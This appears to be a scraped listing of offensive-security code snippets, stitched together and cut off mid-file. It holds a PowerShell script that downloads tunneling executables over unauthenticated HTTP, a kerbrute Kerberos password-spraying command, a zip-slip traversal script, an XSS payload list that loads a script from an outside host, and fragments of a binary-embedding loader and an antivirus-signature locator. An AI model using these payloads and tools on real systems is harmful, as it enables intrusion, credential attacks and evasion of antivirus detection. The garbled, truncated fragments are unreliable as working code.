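# Fetches ssf.exe, ssfd.exe and their TLS material from an HTTP server.
#
# Parameters:
#   -addr  host name or IP address of the server hosting the files
#   -port  TCP port of that server
#
# Side effects: writes ssf.exe and ssfd.exe into the current directory, creates
# a "certs" subdirectory, and leaves the caller's location set to "certs".
#
# NOTE(review): every file is retrieved over plain HTTP with no integrity or
# authenticity check. Anyone on the network path can substitute the executables,
# the certificate or the DH parameters, so TLS trust built on these files is only
# as strong as the HTTP channel. Compare Get-FileHash output against known-good
# values obtained out of band before running anything downloaded here.
param([string]$addr, [string]$port)

$base = "http://${addr}:${port}"

# The 'wget' alias exists only in Windows PowerShell; PowerShell 6+ removed it,
# so call the cmdlet by name and spell out -OutFile instead of the abbreviated -o.
# -UseBasicParsing avoids the Internet Explorer engine dependency on 5.1.
Invoke-WebRequest -Uri "$base/ssf.exe"  -OutFile "ssf.exe"  -UseBasicParsing
Invoke-WebRequest -Uri "$base/ssfd.exe" -OutFile "ssfd.exe" -UseBasicParsing

# -Force makes a re-run succeed when the directory already exists.
New-Item -ItemType Directory -Path "certs" -Force
Set-Location -Path "certs"

Invoke-WebRequest -Uri "$base/certs/certificate.crt" -OutFile "certificate.crt" -UseBasicParsing
Invoke-WebRequest -Uri "$base/certs/dh4096.pem"      -OutFile "dh4096.pem"      -UseBasicParsing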
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With the Rubeus build that includes the brute module:
#!/usr/bin/env python | |
import zipfile | |
import sys | |
import os | |
''' | |
Usage: | |
python zipslip.py xct.zip root.txt ../../../../.. | |
Added ../../../../../root.txt to xct.zip | |
''' |
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
'';!--"<XSS>=&{()} | |
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" | |
<script/src=data:,alert()> | |
<marquee/onstart=alert()> | |
<video/poster/onerror=alert()> | |
<isindex/autofocus/onfocus=alert()> | |
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
<IMG SRC="javascript:alert('XSS');"> | |
<IMG SRC=javascript:alert('XSS')> |
// A demonstration example for http://stackoverflow.com/a/26124494 | |
// It runs a goroutine locked to an OS thread on Windows | |
// then impersonates that thread as another user using its name | |
// and plaintext password, then reverts to the default security | |
// context before detaching from its OS thread. | |
package main | |
import ( | |
"log" | |
"runtime" |
using NtApiDotNet; | |
using System; | |
using System.Collections.Generic; | |
using System.Diagnostics; | |
using System.IO; | |
using System.Linq; | |
using System.Text; | |
using System.Threading; | |
using System.Threading.Tasks; |
package main | |
/* | |
Example Go program with multiple .NET Binaries embedded | |
This requires packr (https://github.com/gobuffalo/packr) and the utility. Install with: | |
$ go get -u github.com/gobuffalo/packr/packr | |
Place all your EXEs in a "binaries" folder
function Find-AVSignature { | |
<# | |
.SYNOPSIS | |
Find-AVSignature | |
Locates single Byte AV signatures utilizing the same method as DSplit from "class101" on heapoverflow.com | |
Authors: Chris Campbell (@obscuresec) & Matt Graeber (@mattifestation) | |
License: BSD 3-Clause |
function Install-WinDbg { | |
param( | |
[switch] $Start | |
) | |
# Change default progress preference (faster downloads) | |
$DefaultProgressPreference = $ProgressPreference | |
$ProgressPreference = 'SilentlyContinue' | |
Write-Host "Downloading windbg.appinstaller (XML manifest file)" |